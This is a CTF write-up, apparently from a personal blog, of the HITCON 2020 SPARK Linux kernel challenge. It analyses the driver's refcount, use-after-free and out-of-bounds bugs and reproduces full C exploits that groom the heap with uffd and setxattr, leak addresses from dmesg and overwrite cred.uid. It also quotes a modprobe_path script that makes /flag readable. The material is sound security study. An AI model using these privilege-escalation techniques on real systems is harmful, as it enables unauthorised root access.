Recent challenge writeups

Let me try my hand at these CTFs

My GitHub Pages blog

SPARK

HITCON CTF 2020

  • The decompiled code contains _InterlockedExchangeAdd(); this is simply how IDA renders an instruction that carries the lock prefix.

The assembly is lock xadd cs:cur_count, eax

The LOCK prefix can be prepended only to the following instructions and only to those forms of the instructions
where the destination operand is a memory operand: ADD, ADC, AND, BTC, BTR, BTS, CMPXCHG, CMPXCHG8B,
CMPXCHG16B, DEC, INC, NEG, NOT, OR, SBB, SUB, XOR, XADD, and XCHG.

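xadd stands for Exchange and Add: the sum is stored in the destination and the destination's old value is loaded into the source register.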
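As a rough illustration of what the instruction computes, here is a small Python model (not kernel code). The function name xadd and the 32-bit operand width are assumptions chosen to match the eax operand; the lock prefix only adds atomicity, which this model does not capture.

```python
MASK32 = 0xFFFFFFFF  # assumption: 32-bit operands, as with eax


def xadd(mem, reg):
    """Model `xadd [mem], reg`: return (new_mem, new_reg).

    The destination receives the sum, the source register receives
    the destination's previous value.
    """
    return (mem + reg) & MASK32, mem


cur_count, eax = 5, 1
cur_count, eax = xadd(cur_count, eax)
print(hex(cur_count), hex(eax))
```

This is why IDA shows it as _InterlockedExchangeAdd(): the call returns the old value while the memory location is incremented.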

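  • There is also the mutex struct, 32 bytes in size. At first I did not bother looking at what it contains.
    It turned out to matter after all: the exploit later uses the owner member of the mutex. While the lock is held, owner holds the address of the current process's task_struct (current), which in turn leads to the address of the cred struct.
  • What exactly is __fentry__ | article in Chinese
  • char (*names)[3]: a pointer to an array of 3 chars.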

OK, I can't follow this. And what is linux/spark.h supposed to be?

Struggling on through the code; spark.h was apparently not provided…

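  • fget() looks up a file descriptor and returns the corresponding struct file.
    The node struct should be at offset 200 in struct file, but I don't know which member of file could store this kind of data (most likely private_data, the usual place where a driver keeps per-file state).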

Insights from the mhackeroni team's writeup:

ioctl commands:

  • Link (0x4008d900): takes two node descriptors A and B, and an edge weight, and creates the edges A->B and B->A;
  • Info (0x8018d901): provides information about the node;
  • Finalize (0xd902): finalizes the graph rooted in the node, preparing it for queries;
  • Query (0xc010d903): takes two node descriptors and calculates the total weight of the shortest path between them.
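The four command numbers follow the generic Linux ioctl encoding (nr in bits 0-7, type in bits 8-15, argument size in bits 16-29, direction in bits 30-31). A minimal sketch that decodes them, assuming that layout (it holds on x86; the helper name decode_ioctl is made up for illustration):

```python
def decode_ioctl(cmd):
    """Split a Linux ioctl number into its fields (generic/x86 layout)."""
    directions = {0: "none", 1: "write", 2: "read", 3: "read|write"}
    return {
        "nr": cmd & 0xFF,               # command index
        "type": (cmd >> 8) & 0xFF,      # driver "magic" byte
        "size": (cmd >> 16) & 0x3FFF,   # size of the argument struct
        "dir": directions[(cmd >> 30) & 0x3],
    }


for name, cmd in [("Link", 0x4008D900), ("Info", 0x8018D901),
                  ("Finalize", 0xD902), ("Query", 0xC010D903)]:
    print(name, decode_ioctl(cmd))
```

The decoded sizes line up with the argument types: 8 bytes for Link (fd plus weight packed into one 64-bit value), 0x18 for Info (three 8-byte fields) and 0x10 for Query (two ints plus a 64-bit distance).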

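In release: if refcount == 1 (the normal case), free the nodes array in traversal (if any), free the edge list entries, then free the node itself.

Some details:

  • On open, each node's refcount starts at 1. During finalize, only the root node does not have its refcount incremented when it enters traversal() (the first entry), so every node other than the root ends up with refcount 2. When the root is released, only root.refcount is below 2, so only the root's edges, its traversal and the node itself are kfree()'d. This looks fine, but is it?
  • Info follows the access chain node->traversal->size, and size sits at offset 0 in traversal. So controlling the traversal field yields an arbitrary read. How can traversal be controlled?
  • finalize calls traversal() to run a DFS that increments each node's refcount, but link and query neither check nor use refcount, and release returns immediately without calling kfree if the refcount is 2 or more. Can refcount be modified?
  • After link, the neighbouring node is stored in an edge. If the node at the other end is freed/released, the node pointer in the edge becomes a dangling pointer that can be used for a UAF. How can the freed chunk be controlled? (uffd + setxattr)
  • query allocates a dis_arr and indexes it with the traversal_idx of the node and of its children. Can it go out of bounds? (Whenever you see an array, ask whether it can be overrun…)
  • Concretely: use uffd + setxattr to control the freed chunk and forge a node with (finalize == 1 && traversal_idx > 16), which produces an OOB (so yes, it really can go out of bounds). What can this OOB modify?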
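The refcount and dangling-edge behaviour described in this list can be mimicked with a toy Python model. This is only a sketch of the logic as the notes describe it, not the module's code: the class and function names are invented, and release is assumed to drop one reference and free the node when the count reaches zero.

```python
class Node:
    def __init__(self, name):
        self.name = name
        self.refcount = 1    # every node starts at 1 on open
        self.edges = []      # (neighbour, weight) pairs
        self.freed = False


def link(a, b, weight):
    a.edges.append((b, weight))
    b.edges.append((a, weight))


def finalize(root):
    """DFS from root; every reached node except the root gains a reference."""
    seen, stack = {root}, [root]
    while stack:
        node = stack.pop()
        for child, _ in node.edges:
            if child not in seen:
                seen.add(child)
                child.refcount += 1
                stack.append(child)


def release(node):
    node.refcount -= 1           # assumption: one reference dropped per close
    if node.refcount == 0:
        node.freed = True        # stands in for kfree(); neighbours are not told


# Dangling edge: b is freed while a still points at it.
a, b = Node("a"), Node("b")
link(a, b, 1)
release(b)
dangling = a.edges[0][0]
print(dangling.name, dangling.freed)

# After finalize, closing a non-root node no longer frees it.
root, child = Node("root"), Node("child")
link(root, child, 1)
finalize(root)
release(child)
print(child.refcount, child.freed)
```

Both cases matter for the exploit: the first gives the use-after-free through the edge list, the second explains why corrupting a refcount changes which nodes get freed.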

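Most kernel challenges are about privilege escalation: become root and then read /flag. The usual routes are an arbitrary write primitive or calling commit_creds(prepare_kernel_cred(0)).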

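A summary of the likely approach:

  • Recover the type information of the .ko file. Reading the examples in demo.c helps with understanding.
  • With the types recovered, this looks like a kernel heap exploit centred on kmalloc and kfree. First build an arbitrary read.
  • getinfo offers a possible arbitrary read (as long as traversal is controlled), which only requires controlling the node struct while its fd is still open; the mutex is in use, and its owner member leads straight to cred; there is a UAF; and there is the refcount problem.
  • traversal_idx is a property of the node, not of a particular traversal. query also uses the node's children, i.e. it assumes that all children belong to the same traversal.
  • Putting this together with the uffd + setxattr technique: after linking up a graph and releasing one fd, the node's contents can be rewritten immediately. This is the basic building block. How to go further?
  • Set node->traversal_idx beyond the bounds of dis_arr so that query writes out of bounds and modifies the refcount of tmp_node. Then, when the root is released, only tmp_node and the root are freed, while tmp_node's fd is unaffected. Allocating right after that gives the arbitrary read.
    • A small remaining problem: how to place dis_arr right before a node? The exp shows how: allocate some nodes before and after, and among the two hundred nodes in the middle free one every few nodes. The size of dis_arr is determined by the number of nodes visited during traversal, so with 16 or 17 linked nodes (why? think about it) dis_arr lands exactly in one of the gaps left by the freed nodes, which satisfies the positional requirement for the out-of-bounds write.
    • Then what to read?
  • Read node.lock.owner to locate cred. Because get_info has already taken mutex_lock(a1->state_lock) by the time it reads v3->size, owner can be read directly.
  • The next question is where the node struct is. So before reading owner, scan memory for a special value we planted; with an arbitrary read this is feasible. But where to scan?
  • The main problem is that no kernel address is known yet, especially for the region kmalloc allocates from. However, dmesg is available: use the OOB to trigger a crash, then read the register dump to obtain the relevant addresses. This can be done through libc (klogctl); see stage 1 in the source.
    The crash causes a kernel error and stops the process, but doing it in a forked child that is simply left to exit avoids the problem.
  • At this point stages 1 and 2 and the start of stage 3 are done. The next task is to build an arbitrary write that sets uid in cred to 0 (root).
  • Back to the OOB: in principle it can overwrite an address with the weight of the edge to the first child node, but to hit cred.uid the address of dis_arr must also be known. Stage 1 allocated a dis_arr that was never freed because of the crash. If traversal is freed via release(fd) and query is called right afterwards, we both know the address (from stage 1) and get a usable dis_arr.
  • Next, construct the required structure. It needs an extra root plus some other nodes, joined with fd into one graph, with the weight of the edge to fd set to 0 (and is_finalized != 1) as the value to write. The order of the freeing and the graph building should not matter.
    • Another detail: the root and the other nodes used here were all allocated before stage 1, perhaps to avoid disturbing the heap layout.
  • Finally, modify traversal_idx and run a query from the root, which completes the overwrite of cred.uid. At the very end, just print /flag.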
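The index arithmetic behind the out-of-bounds write can be sketched in Python. This assumes 8-byte dis_arr entries and 64-bit wrap-around of the address computation, as the C exploit's (write_addr - s1_dist_addr) / 8 suggests; the helper names and the sample addresses are hypothetical.

```python
MASK64 = (1 << 64) - 1
ENTRY = 8  # assumption: each dis_arr entry is 8 bytes


def oob_index(dist_addr, target_addr):
    """traversal_idx that makes &dis_arr[idx] land on target_addr (mod 2**64)."""
    delta = (target_addr - dist_addr) & MASK64
    if delta % ENTRY:
        raise ValueError("target is not 8-byte aligned relative to dis_arr")
    return delta // ENTRY


def element_addr(dist_addr, idx):
    """Address the kernel would write to for a given index."""
    return (dist_addr + idx * ENTRY) & MASK64


# Stage 2: dis_arr is 0x80 bytes and the next chunk's refcount is at offset 8.
stage2_idx = oob_index(0, 0x80 + 0x8)

# A target below dis_arr is still reachable thanks to the wrap-around.
dist = 0xFFFF888000010000     # hypothetical dis_arr address
target = 0xFFFF888000008018   # hypothetical target address
idx = oob_index(dist, target)
print(stage2_idx, hex(idx), hex(element_addr(dist, idx)))
```

The stage 2 value matches the (0x80 + 0x8) / 8 that the exploit passes as traversal_idx, and the second case shows why the target does not have to sit above dis_arr.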

Is this really a challenge that can be finished in 36 hours??

exp
#define _GNU_SOURCE

#include <stdio.h>
#include <stdint.h>
#include <assert.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <pthread.h>
#include <sys/mman.h>
#include <syscall.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <sys/xattr.h>
#include <errno.h>
#include <signal.h>
#include <sys/klog.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>
#include <semaphore.h> //used to set uffd interface

#define DEV_PATH "/dev/node"
#define SPARK_FINALIZE 0xd902
#define SPARK_LINK 0x4008d900
#define SPARK_QUERY 0xc010d903
#define SPARK_INFO 0x8018D901

struct spark_ioctl_query
{
    int fd1;
    int fd2;
    long long distance;
};

struct spark_info
{
    unsigned long num_children;
    unsigned long traversal_idx;
    unsigned long traversal_size;
};

static unsigned g_create_next_id;

static int create()
{
    int fd = open(DEV_PATH, O_RDONLY);
    assert(fd != -1);
    g_create_next_id++;
    return fd;
}

static void llink(int a, int b, unsigned int weight)
{
    assert(ioctl(a, SPARK_LINK, b | ((unsigned long long)weight << 32)) == 0);
}

static long long query(int a, int b)
{
    struct spark_ioctl_query qry = {
        .fd1 = a,
        .fd2 = b,
    };
    assert(ioctl(a, SPARK_QUERY, &qry) == 0);
    return qry.distance;
}

static void finalize(int a)
{
    assert(ioctl(a, SPARK_FINALIZE) == 0);
}

static void get_info(int a, struct spark_info *info)
{
    assert(ioctl(a, SPARK_INFO, info) == 0);
}

static void release(int a)
{
    assert(close(a) == 0);
}

struct fault_arg
{
    sem_t fault_sem;
    sem_t unblock_sem;
    void *addr;
};

static void *fault_thread(void *arg)
{
    struct fault_arg *param = (struct fault_arg *)arg;

    unsigned char *page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    assert(page != MAP_FAILED);
    page[0] = 0xff; // top byte for traversal addr

    // create a userfaultfd object
    int uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    assert(uffd != -1);

    // enable the userfaultfd object
    struct uffdio_api uffdio_api;
    uffdio_api.api = UFFD_API;
    uffdio_api.features = 0;
    assert(ioctl(uffd, UFFDIO_API, &uffdio_api) == 0);

    // n_addr is the start of where you want to catch the pagefault. In our
    // case, we set it to the address of page 2
    struct uffdio_register uffdio_register;
    uffdio_register.range.start = (unsigned long)param->addr;
    uffdio_register.range.len = 0x1000;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    assert(ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == 0);

    assert(sem_post(&param->fault_sem) == 0);

    struct pollfd pollfd;
    int nready;
    pollfd.fd = uffd;
    pollfd.events = POLLIN;
    nready = poll(&pollfd, 1, -1);
    assert(nready != -1);

    struct uffd_msg msg;
    assert(read(uffd, &msg, sizeof(msg)) == sizeof(msg));
    assert(msg.event == UFFD_EVENT_PAGEFAULT);

    assert(sem_post(&param->fault_sem) == 0);
    // wait until reclaim_free is called. but in stage1 it doesn't exist.
    assert(sem_wait(&param->unblock_sem) == 0);

    struct uffdio_copy uffdio_copy;
    uffdio_copy.src = (unsigned long)page;
    uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~0xfffUL;
    uffdio_copy.len = 0x1000;
    uffdio_copy.mode = 0;
    uffdio_copy.copy = 0;
    assert(ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == 0);

    close(uffd);
    munmap(page, 0x1000);

    return NULL;
}

struct setxattr_arg
{
    const void *buf;
    size_t size;
};

static void *setxattr_thread(void *arg)
{
    struct setxattr_arg *param = (struct setxattr_arg *)arg;
    assert(setxattr(".", "nonexistent", param->buf, param->size, XATTR_REPLACE) == -1);
    return NULL;
}

struct reclaim_ctx
{
    struct fault_arg fault_arg;
    struct setxattr_arg setxattr_arg;
    pthread_t setxattr_handle;
};

static void reclaim_alloc_raw(struct reclaim_ctx *ctx, char *buf)
{
    char *mem = mmap(NULL, 0x2000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    assert(mem != MAP_FAILED);

    ctx->fault_arg.addr = mem + 0x1000;
    assert(sem_init(&ctx->fault_arg.fault_sem, 0, 0) == 0);
    assert(sem_init(&ctx->fault_arg.unblock_sem, 0, 0) == 0);

    pthread_t handle;
    assert(pthread_create(&handle, NULL, fault_thread, &ctx->fault_arg) == 0);
    assert(sem_wait(&ctx->fault_arg.fault_sem) == 0);

    char *node = mem + 0x1000 - 0x7e;
    // memcpy could cross boundaries
    for (int i = 0; i < 0x7e; i++)
        node[i] = buf[i];

    ctx->setxattr_arg.buf = node;
    ctx->setxattr_arg.size = 0x7f; // avoid copy_from_user 16b optimization
    assert(pthread_create(&ctx->setxattr_handle, NULL, setxattr_thread, &ctx->setxattr_arg) == 0);

    assert(sem_wait(&ctx->fault_arg.fault_sem) == 0);
}

static void reclaim_alloc(struct reclaim_ctx *ctx, unsigned int is_finalized,
                          unsigned long num_children, unsigned long traversal_idx,
                          unsigned long traversal)
{
    char buf[0x80];
    memset(buf, 0, sizeof(buf));
    *(unsigned int *)(buf + 0x8) = 1;               // refcount
    *(unsigned int *)(buf + 0x30) = is_finalized;   // is_finalized
    *(unsigned long *)(buf + 0x58) = num_children;  // num_children
    *(unsigned long *)(buf + 0x70) = traversal_idx; // traversal_idx
    *(unsigned long *)(buf + 0x78) = traversal;     // traversal

    reclaim_alloc_raw(ctx, buf);
}

static void reclaim_free(struct reclaim_ctx *ctx)
{
    assert(sem_post(&ctx->fault_arg.unblock_sem) == 0);
    assert(pthread_join(ctx->setxattr_handle, NULL) == 0);
}

static void stage1_leak_dmesg(unsigned long *dist_addrp, unsigned long *edges_addrp)
{
    int i, sz;
    char *buf;

    //*query the size of the kernel ring buffer
    sz = klogctl(10, NULL, 0);
    assert(sz != -1);

    buf = malloc(sz);
    //*read all message from the kernel buffer into @buf.
    assert(klogctl(3, buf, sz) != -1);

    unsigned long dist_addr = 0, edges_addr = 0;
    for (i = 0; i < sz && (!dist_addr || !edges_addr); i++)
    {
        //*rax stores dis_arr
        if (!dist_addr && !strncmp(buf + i, "RAX: ", 5))
        {
            if (sscanf(buf + i + 5, "%lx", &dist_addr) != 1)
                dist_addr = 0;
        }
        //*r9 stores the edge
        if (!edges_addr && !strncmp(buf + i, "R09: ", 5))
        {
            if (sscanf(buf + i + 5, "%lx", &edges_addr) != 1)
                edges_addr = 0;
        }
    }
    assert(dist_addr && edges_addr);

    free(buf);

    *dist_addrp = dist_addr;
    *edges_addrp = edges_addr;
}

// resulting size should be in a rarely used cache
// this is supposed to be arbitrary but if you change it you'll mess up stage 3
#define S1_DIST_NUM_NODES 12

static void stage1(unsigned long *dist_addrp, unsigned long *node_addrp, int *node_fdp)
{
    fprintf(stderr, "[S1] Creating graph\n");
    int fds[S1_DIST_NUM_NODES];
    for (int i = 0; i < S1_DIST_NUM_NODES; i++)
        fds[i] = create();
    for (int i = 1; i < S1_DIST_NUM_NODES; i++)
        llink(fds[0], fds[i], 1);

    fprintf(stderr, "[S1] Freeing node\n");
    release(fds[S1_DIST_NUM_NODES - 1]);

    //*the crashed process stops executing, so fork a child process here.
    pid_t pid = fork();
    assert(pid != -1);

    if (pid == 0)
    { //*child process
        fprintf(stderr, "[S1] Reclaiming node\n");
        struct reclaim_ctx ctx;
        //*finalized the last node, avoid the revise of the next finalize
        reclaim_alloc(&ctx, 1, 0, 0x4141000000000000UL, 0);

        fprintf(stderr, "[S1] Finalizing root\n");
        finalize(fds[0]);

        fprintf(stderr, "[S1] Performing crash query by UAF\n");
        query(fds[0], fds[1]);

        // Will never get here
        exit(1);
    }

    usleep(250 * 1000);

    fprintf(stderr, "[S1] Leaking from dmesg\n");
    unsigned long dist_addr, edges_addr;
    stage1_leak_dmesg(&dist_addr, &edges_addr);
    unsigned long node_addr = edges_addr - 0x60;
    fprintf(stderr, "[S1] Dist @ 0x%lx\n", dist_addr);
    fprintf(stderr, "[S1] Node @ 0x%lx\n", node_addr);

    *dist_addrp = dist_addr;
    *node_addrp = node_addr;
    *node_fdp = fds[0];
#undef STAGE1_NUM_NODES
}

static void stage2_spray(int *fd, int before, int n, int skip, int after)
{
    for (int i = 0; i < before; i++)
        create();
    for (int i = 0; i < n; i++)
        fd[i] = create();
    for (int i = 0; i < n; i += skip)
    {
        release(fd[i]);
        fd[i] = -1;
    }
    for (int i = 0; i < after; i++)
        create();
}

static void stage2(struct reclaim_ctx *victim_ctx, int *victim_fdp)
{
//*errrrrrr, dist array size will be 8b less than STAGE2_NUM_NODES*8
#define STAGE2_NUM_NODES 17 // dist array size == 0x80 == sizeof node
    fprintf(stderr, "[S2] Creating graph\n");
    int fds[STAGE2_NUM_NODES];
    for (int i = 0; i < STAGE2_NUM_NODES; i++)
        fds[i] = create();
    for (int i = 1; i < STAGE2_NUM_NODES; i++)
        llink(fds[0], fds[i], 1); // 1 will be written at traversal_idx

    fprintf(stderr, "[S2] Freeing node\n");
    release(fds[STAGE2_NUM_NODES - 1]);

    fprintf(stderr, "[S2] Reclaiming node\n");
    //*the idx is 17
    reclaim_alloc(victim_ctx, 1, 0, (0x80 + 0x8) / 8, 0); // target: sprayed refcount

    fprintf(stderr, "[S2] Finalizing root\n");
    //*now fds[0] have children in different traversals. the last and the others.
    finalize(fds[0]);

    fprintf(stderr, "[S2] Creating predecessor\n");
    int spray_incref_fd = create();

#define STAGE2_SPRAY_NUM 200
    fprintf(stderr, "[S2] Spraying nodes\n");
    int spray_fd[STAGE2_SPRAY_NUM];
    stage2_spray(spray_fd, 30, STAGE2_SPRAY_NUM, 4, 30);

    fprintf(stderr, "[S2] Incrementing sprayed refcounts\n");
    for (int i = 0; i < STAGE2_SPRAY_NUM; i++)
    {
        if (spray_fd[i] != -1)
            llink(spray_incref_fd, spray_fd[i], 0);
    }
    //*above ops create gaps in size of struct_node for dis_arr
    //*next line there is nothing special
    finalize(spray_incref_fd);

    fprintf(stderr, "[S2] Corrupting refcount\n");
    //*use the OOB to corrupt the dis_arr's adjacent node struct.
    query(fds[0], fds[1]);

    fprintf(stderr, "[S2] Freeing victim node\n");
    //*release the root, but only the node whose refcount has been modified will be freed
    //*and all fds except for root retain the same as before.
    release(spray_incref_fd);

    fprintf(stderr, "[S2] Reclaiming victim node\n");
    reclaim_free(victim_ctx); // unblock fault
                              // ephemeral alloc to put two 0xff at the end for traversal top bytes
                              //*these two bytes are in next uffd page
    unsigned char buf[0x80];
    buf[sizeof(buf) - 1] = 0xff;
    buf[sizeof(buf) - 2] = 0xff;
    //*now there are several gaps in size of node_t, which one will be chosen?
    //*good luck. at least the following two lines will use the same chunk.
    assert(setxattr(".", "nonexistent", buf, sizeof(buf), XATTR_REPLACE) == -1);
    reclaim_alloc(victim_ctx, 0, 1337, 0, 0);

    fprintf(stderr, "[S2] Searching for victim node(fd)\n");
    int victim_fd = -1;
    for (int i = 0; i < STAGE2_SPRAY_NUM; i++)
    {
        if (spray_fd[i] != -1)
        {
            struct spark_info info = {
                .num_children = 0,
            };
            get_info(spray_fd[i], &info);
            if (info.num_children == 1337)
            {
                victim_fd = spray_fd[i];
                break;
            }
        }
    }
    //*indeed, this totally depends on luck...
    assert(victim_fd != -1);

    fprintf(stderr, "[S2] Victim fd = %d\n", victim_fd);
    *victim_fdp = victim_fd;
#undef STAGE2_SPRAY_NUM
#undef STAGE2_NUM_NODES
}

#define STAGE3_READ_NUM_CHILDREN 0x4142133703030303

static unsigned long stage3_read(struct reclaim_ctx *ctx, int fd, unsigned long addr)
{
    reclaim_free(ctx);
    // during read, we keep a special num_children so we can find ourselves
    reclaim_alloc(ctx, 1, STAGE3_READ_NUM_CHILDREN, 0, addr);

    struct spark_info info;
    get_info(fd, &info);
    return info.traversal_size;
}

static void stage3(struct reclaim_ctx *ctx, int fd, int *scratch_fds, unsigned long s1_dist_addr,
                   unsigned long s1_node_addr)
{
    char buf[0x80];

    fprintf(stderr, "[S3] Finding victim node\n");
    //*.......nb
    unsigned long victim_addr = 0;
    for (int i = 6000; i < 10000; i++)
    {
        //*why the node is sizeof(node_t) aligned???
        //*is there something strange in kernel slab memory manager?
        //*7000~7800
        unsigned long addr = s1_node_addr + i * 0x80;
        unsigned long value = stage3_read(ctx, fd, addr + 0x58);
        if (value == STAGE3_READ_NUM_CHILDREN)
        {
            victim_addr = addr;
            break;
        }
    }
    assert(victim_addr);
    fprintf(stderr, "[S3] Victim @ 0x%lx\n", victim_addr);

    fprintf(stderr, "[S3] Findings creds\n");
    unsigned long current = stage3_read(ctx, fd, victim_addr + 0x10); // state_lock.owner
    fprintf(stderr, "[S3] current = 0x%lx\n", current);
    unsigned long cred_addr = stage3_read(ctx, fd, current + 0xa90);
    fprintf(stderr, "[S3] cred @ 0x%lx\n", cred_addr);

    fprintf(stderr, "[S3] Crafting linkable node\n");
    memset(buf, 0, sizeof(buf));
    *(unsigned long *)(buf + 0x0) = 100000;              // id
    *(unsigned int *)(buf + 0x8) = 1;                    // refcount
    *(unsigned int *)(buf + 0x30) = 0;                   // is_finalized
    *(unsigned long *)(buf + 0x60) = victim_addr + 0x60; // edges.next (empty list)
    *(unsigned long *)(buf + 0x68) = victim_addr + 0x68; // edges.prev (empty list)
    reclaim_free(ctx);
    reclaim_alloc_raw(ctx, buf);

    fprintf(stderr, "[S3] Building graph\n");
    int graph_fds[S1_DIST_NUM_NODES];
    for (int i = 0; i < S1_DIST_NUM_NODES - 1; i++)
        graph_fds[i] = scratch_fds[i]; // avoid allocations, they mess stuff up
    for (int i = 1; i < S1_DIST_NUM_NODES - 1; i++)
        llink(graph_fds[0], graph_fds[i], 0);
    llink(graph_fds[0], fd, 0); // weight = write primitive value (zero for root creds)
    finalize(graph_fds[0]);

    fprintf(stderr, "[S3] Freeing stage1 dist array\n");
    //*due to stage 1 child process crashed, we have no choice but this method.
    memset(buf, 0, sizeof(buf));
    *(unsigned int *)(buf + 0x8) = 1;                     // refcount
    *(unsigned int *)(buf + 0x30) = 1;                    // is_finalized
                                                          // fake node_array overlaps unused nb_lock
    *(unsigned long *)(buf + 0x38 + 0x0) = 0;             // fake node_array.size
    *(unsigned long *)(buf + 0x38 + 0x10) = s1_dist_addr; // fake node_array.nodes (will be freed)
    *(unsigned long *)(buf + 0x60) = victim_addr + 0x60;  // edges.next (empty list)
    *(unsigned long *)(buf + 0x78) = victim_addr + 0x38;  // traversal = fake node_array
    reclaim_free(ctx);
    reclaim_alloc_raw(ctx, buf);
    release(fd);   // free s1_dist_addr
    fd = create(); // immediately reclaim victim node to restore stable state

    fprintf(stderr, "[S3] Overwriting cred\n");
    unsigned long write_addr = cred_addr + 8 * 3;
    unsigned long idx = (write_addr - s1_dist_addr) / 8;
    reclaim_free(ctx);
    reclaim_alloc(ctx, 1, 0, idx, 0);
    query(graph_fds[0], graph_fds[1]);  //kmalloc the original s1_dist_addr
}

static void print_flag()
{
    int fd = open("/flag", O_RDONLY);
    assert(fd != -1);

    char buf[100];
    memset(buf, 0, sizeof(buf));
    assert(read(fd, buf, sizeof(buf) - 1) != -1);
    close(fd);

    fprintf(stderr, "!!! FLAG: %s\n", buf);
}

int main(void)
{
    //*what are these?
    int scratch_fds[12];
    for (int i = 0; i < 12; i++)
        scratch_fds[i] = create();

    // Leak a distance array (still malloc'ed) and the address of a live node
    unsigned long s1_dist_addr, s1_node_addr;
    int s1_node_fd;
    stage1(&s1_dist_addr, &s1_node_addr, &s1_node_fd);

    // Get a fd that can be freed and reclaimed repeatedly
    struct reclaim_ctx victim_ctx;
    int victim_fd;
    stage2(&victim_ctx, &victim_fd);

    // Get somewhat rootish privileges
    stage3(&victim_ctx, victim_fd, scratch_fds, s1_dist_addr, s1_node_addr);
    print_flag();
}
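The dmesg parsing done by stage1_leak_dmesg can be prototyped quickly in Python before committing it to C. The sketch below is only an illustration: the sample log lines and their values are made up, and the regular expression assumes the usual x86-64 oops register layout ("RAX: <16 hex digits>", with a segment prefix on the RSP line).

```python
import re

# Register name, optional "0018:"-style segment prefix, 16 hex digits.
REG_RE = re.compile(r"\b(R[A-Z0-9]{2}): (?:[0-9a-f]{4}:)?([0-9a-f]{16})")


def parse_registers(log_text):
    """Return {register: value}, keeping the first occurrence of each name."""
    regs = {}
    for name, value in REG_RE.findall(log_text):
        regs.setdefault(name, int(value, 16))
    return regs


# Hypothetical excerpt of a kernel oops, for illustration only.
sample = (
    "RSP: 0018:ffffc900001afe60 EFLAGS: 00010246\n"
    "RAX: ffff88800e2f1a80 RBX: 0000000000000000 RCX: 0000000000000000\n"
    "RBP: ffffc900001afea8 R08: 0000000000000000 R09: ffff88800d41c360\n"
)

regs = parse_registers(sample)
dist_addr = regs["RAX"]          # the exploit reads dis_arr from RAX
node_addr = regs["R09"] - 0x60   # and the edge list head from R09
print(hex(dist_addr), hex(node_addr))
```

Keeping only the first match per register mirrors the C loop, which stops updating a value once it has been found.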

From perfectblue's exp:

Layout of the mutex:

struct mutex {
  uint64_t owner;
  uint64_t wait_lock;
  void* prev;
  void* next;
};
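A small Python sketch of how a leaked 32-byte mutex could be decoded, following the field order of the struct above. The low three bits of owner are flag bits in mainline kernels, so the task pointer is owner with those bits cleared; the sample values and the helper name parse_mutex are hypothetical.

```python
import struct

MUTEX_FLAGS = 0x07  # low 3 bits of owner hold flags, the rest is the task pointer


def parse_mutex(raw):
    """Decode 32 bytes laid out as owner, wait_lock, prev, next (little-endian)."""
    owner, wait_lock, prev, nxt = struct.unpack("<4Q", raw)
    return {
        "task": owner & ~MUTEX_FLAGS,   # address of the owning task_struct
        "flags": owner & MUTEX_FLAGS,
        "wait_lock": wait_lock,
        "prev": prev,
        "next": nxt,
    }


# Hypothetical leak: owner has one flag bit set, the wait list is empty.
raw = struct.pack("<4Q", 0xFFFF88800F4A8001, 0,
                  0xFFFF88800E2F1A98, 0xFFFF88800E2F1A98)
info = parse_mutex(raw)
print(hex(info["task"]), info["flags"])
```

With an uncontended lock the flag bits are normally zero, which is why reading owner directly, as the first exploit does, is enough there.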

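Improvements:

  • The first crash can use refcount_warn_saturate: setting refcount to 0 triggers the warning in finalize and hence the crash. The exp, however, simply sleeps to wait for the thread and takes the dmesg information by manual input. The kernel-log parsing code from the previous team's exp can be reused here to avoid wasting time while debugging.
    OK, this is quite problematic: once inside that function the register values have all changed. Hard to judge.
  • I can't tell what the leaked value actually is; what are kmalloc_32/128??? And there is no writeup that explains it.
exp: omitted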

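From team Balsn:

Just over two hundred lines; very concise.

  • The crash uses refcount_warn_saturate, because a release before finalize drops the refcount to 0.
  • It uses msgsnd; the resulting kmalloc has a maximum and a minimum length and carries a 0x30 (48) byte header.
  • msgsnd can only control the last 0x50 bytes, i.e. the last four lines below: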
struct node_t
{
  uint64_t id;
  uint64_t refcount;
  char state_lock[32];
  uint64_t is_finalized;
  char nb_lock[32];
  //following is under control
  uint64_t num_children;
  struct list_head_t edges;
  uint64_t traversal_idx;
  struct node_list_t *traversal;
};
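  • It is unclear how they determined that rbx holds kernel_heap; possibly by comparing the registers in the crash dump with the real heap and picking the closest address.
  • A neat trick is used to obtain the address of dis_arr: set up a very large buffer in user space, guess an address near the known heap address, and let the out-of-bounds idx offset wrap around from the kernel address into that buffer. Checking which location in the buffer was modified reveals the real dis_arr address. From dis_arr, compute the index of the saved return address on the kernel stack and redirect it to the shellcode function, which overwrites modprobe_path.
    This works because SMEP and SMAP are not enabled.

Problems encountered:

  • Reading the kernel error messages failed inexplicably; switching to klogctl made it work. Changed the odd trick of crashing via a command-line argument. Changed kernel_ret to the stack location where query's return address is stored.

modprobe:

The key is to create a program whose header (magic bytes) is of an unknown format. When it is executed, the kernel runs /tmp/y (the overwritten modprobe_path) to handle it, and here that script simply changes the permissions of /flag.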

#!/bin/sh                                           
echo -ne '\xffyyy' > fake
echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/y
chmod +x fake
chmod +x /tmp/y
/balsn
/balsn
/balsn
cat /flag
exp:
// musl-gcc exp.c -o exp -static -masm=intel
//
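#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <stdint.h>
#include <syscall.h>
#include <string.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/ioctl.h> // ioctl
#include <sys/klog.h>  // klogctl
#include <signal.h>
#include <assert.h>
// note: <unistd.h> is left out on purpose, its link() would clash with the link() helper below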

#define SPARK_LINK 0x4008D900
#define SPARK_GET_INFO 0x8018D901
#define SPARK_FINALIZE 0xD902
#define SPARK_QUERY 0xC010D903

#define PAUSE scanf("%*c");

struct spark_ioctl_query
{
    int fd1;
    int fd2;
    size_t distance;
};

struct Link_Header
{
    struct Link_Header *fd, *bk;
};

struct Node
{
    size_t id;
    size_t refcount;
    size_t state_lock[4];
    size_t finalized;
